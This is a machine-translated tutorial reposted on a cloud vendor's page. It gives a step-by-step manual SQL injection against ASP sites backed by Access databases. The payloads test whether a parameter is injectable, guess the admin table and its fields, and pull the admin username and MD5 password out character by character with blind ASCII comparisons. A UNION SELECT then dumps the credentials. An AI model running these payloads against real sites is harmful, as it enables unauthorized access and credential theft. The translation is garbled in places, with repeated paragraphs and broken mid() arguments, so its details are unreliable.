Access manual injection notes

Source: Internet
Author: User
Www. xxx. comnews. asp? Id6 injection points determine whether there are two injections. The returned results are different. Are there injection www. xxx. comnews. asp? Id6and11www. xxx. comnews. asp? Id6and12 indicates that the database may not be tested due to local issues and (selectcount (*) frommsys

Http://www.xxx.com/news.asp? Id = 6 injection points determine whether there is injection two return different exist injection http://www.xxx.com/news.asp? Id = 6 and 1 = 1 http://www.xxx.com/news.asp? Id = 6 and 1 = 2 it is determined that the database may be a local problem and (select count (*) from msys

Http://www.xxx.com/news.asp? Id = 6
InjectionPoint

Determine whether there isInjectionTwo different responses existInjection
Http://www.xxx.com/news.asp? Id = 6 and 1 = 1

Http://www.xxx.com/news.asp? Id = 6 and 1 = 2

The database may not be tested due to a local problem.
And (select count (*) from msysobjects)> 0 (return access database with insufficient permissions)
And (select count (*) from sysobjects)> 0 (MSSQL database is returned normally)


Name of the table to be guessed (admin exists if the table is normal, and admin exists if the table is abnormal)

And exists (select * from admin)

If the returned result is correct and admin exists, we can enter one. The returned error does not exist.


Now let's guess the field
And exists (select username from admin)

And exists (select password from admin)

No error indicates that both fields do not exist.


Guess the username and password length

And (select top 1 len (username) from admin)> 0
And (select top 1 len (password) from admin)> 0

Guess the username and password content:
And (select top 1 asc (mid (username, 1, 1) from admin)> 97
And (select top 1 asc (mid (username, 1, 1) from admin) = 97
And (select top 1 asc (mid (username, 100) from admin) =
And (select top 1 asc (mid (username, 109) from admin) =
And (select top 1 asc (mid (username, 105) from admin) =
And (select top 1 asc (mid (username, 5, 1) from admin) = 110

97 100 109 105 110 admin

------------------------------------------------------
And (select top 1 asc (mid (password, 1, 1) from admin) = 52
And (select top 1 asc (mid (password, 2, 1) from admin) = 54
And (select top 1 asc (mid (password, 3, 1) from admin) = 57
And (select top 1 asc (mid (password, 4, 1) from admin) = 56
And (select top 1 asc (mid (password, 5, 1) from admin) = 48
And (select top 1 asc (mid (password, 6, 1) from admin) = 100
And (select top 1 asc (mid (password, 7,1) from admin) = 51
And (select top 1 asc (mid (password, 8, 1) from admin) = 50
And (select top 1 asc (mid (password, 9,1) from admin) = 99
And (select top 1 asc (mid (password, 10, 1) from admin) = 48
And (select top 1 asc (mid (password, 11,1) from admin) = 53
And (select top 1 asc (mid (password, 12, 1) from admin) = 53
And (select top 1 asc (mid (password, 13, 1) from admin) = 57
And (select top 1 asc (mid (password, 102) from admin) =
And (select top 1 asc (mid (password, 15, 1) from admin) = 56
And (select top 1 asc (mid (password, 16,1) from admin) = 32

52 54 57 101 56 48 100 51 50 99 48 53 57 102 56 32
The password obtained by 469e80d32c0559f8 md5 is admin888.
========================================================== ==================
(2) Joint query of exposed management accounts and passwords

First, use order by to display the number of fields, and then:

Http://www.xxx.com/news.asp? Id = 6 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 from admin

Syntax: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 indicates the column length.
From admin Query

After running, two to three numbers are displayed. For example, if the number is 4 or 12, modify the substatement (that is, modify the substatement to the column name in 4 or 12, and change it to the red part ):
Http://www.xxx.com/news.asp? Id = 6 and 1 = 2 union select 1, 2, 3, usermane, 5, 6, 7, 8, 9, 10, 11, password, 13, 14, 15 from admin

In this way, the Administrator account and password can be disclosed. Of course, you can also blow up your account first:

Http://www.xxx.com/news.asp? Id = 6 and 1 = 2 union select 1, 2, 3, username, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 from admin

Password cracking:
Http://www.xxx.com/news.asp? Id = 6 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, password, 15 from admin

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.